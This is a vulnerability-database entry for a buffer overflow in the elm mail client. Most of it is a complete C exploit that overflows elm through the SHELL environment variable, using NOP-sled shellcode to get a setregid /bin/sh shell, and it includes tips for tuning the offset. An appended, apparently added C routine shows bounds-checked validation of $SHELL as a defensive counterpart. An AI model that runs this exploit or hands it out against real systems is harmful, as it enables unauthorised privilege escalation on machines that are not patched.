Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (2)
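Vulnerability ID | 1053446 | Vulnerability type | |
Published | 2000-05-27 | Updated | 2000-05-27 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Unix | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit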
source: http://www.securityfocus.com/bid/1276/info
Buffer overflow vulnerabilities exist in elm (Electronic Mail for Unix).
```c
/*
Elm 2.5 PL3 exploit
Tested Under Linux Slackware 3.6, 4.0, 7.0
By xfer ([email protected])
Of Buffer0verfl0w Security
At Sat May 27 18:52:14 CEST 2000
HowTo: Hmmm.. Ya have to play with offset.
MoreInfo: Elm is shit, it has bug in each option or function ;>.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PATH "/usr/local/bin/elm"
#define BUFFER 256
#define NOP 0x90

/* setregid + generic shell code */
char shellcode[] = "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0"
                   "\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0"
                   "\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07"
                   "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
                   "\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f"
                   "\x62\x69\x6e\x2f\x73\x68";

unsigned long get_esp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[]) {
    char buff[BUFFER];
    int x, offset = 0;
    long address;

    if (argc > 1) offset = atoi(argv[1]);
    address = get_esp() + offset;
    fprintf(stderr, "Address: 0x%lx\nOffset: %d\nShellSize: %d\n", address, offset, strlen(shellcode));
    for (x = 3; x < BUFFER; x += 4) *(int *)&buff[x] = address;
    for (x = 0; x < (BUFFER - strlen(shellcode)); x++) buff[x] = NOP;
    memcpy(buff + (BUFFER - strlen(shellcode)), shellcode, strlen(shellcode));
    /* The oversized buffer reaches elm through the SHELL environment variable. */
    setenv("SHELL", buff, 1);
    if ((execl(PATH, "elm", 0)) < 0) fprintf(stderr, "Kurwa Mac! No %s file ?\n", PATH);
    return 0;
}
```
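A defensive counterpart, added here and not taken from the page or from elm's source: the exploit above delivers its buffer through the SHELL environment variable, so a program reading SHELL should length-check and validate it before copying it into a fixed buffer. The names `env_path_bounded`, `resolve_shell`, `SHELL_MAX` and `DEFAULT_SHELL` are hypothetical, and the page does not show how elm itself handles the variable.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SHELL_MAX 64             /* assumed size of the destination buffer */
#define DEFAULT_SHELL "/bin/sh"  /* assumed fallback when $SHELL is rejected */

/*
 * Copy environment variable `name` into dst (dstsz bytes).
 * Returns 0 on success; -1 with errno set when the variable is unset,
 * does not fit (no silent truncation), is not an absolute path, or
 * contains bytes outside printable, non-space ASCII.
 */
int env_path_bounded(const char *name, char *dst, size_t dstsz)
{
    const char *val = getenv(name);
    size_t len, i;

    if (val == NULL || dst == NULL || dstsz == 0) { errno = EINVAL; return -1; }
    len = strlen(val);
    if (len >= dstsz) { errno = ENAMETOOLONG; return -1; }
    if (val[0] != '/') { errno = EINVAL; return -1; }
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)val[i];
        if (c < 0x21 || c > 0x7e) { errno = EINVAL; return -1; }
    }
    memcpy(dst, val, len + 1);   /* len + 1 <= dstsz, terminator included */
    return 0;
}

/* Fill dst with a usable shell path: 1 = validated $SHELL, 0 = fallback. */
int resolve_shell(char *dst, size_t dstsz)
{
    if (env_path_bounded("SHELL", dst, dstsz) == 0)
        return 1;
    snprintf(dst, dstsz, "%s", DEFAULT_SHELL);
    return 0;
}

int main(void)
{
    char shell[SHELL_MAX];
    int from_env = resolve_shell(shell, sizeof shell);

    printf("shell=%s (%s)\n", shell, from_env ? "from $SHELL" : "fallback");
    return 0;
}
```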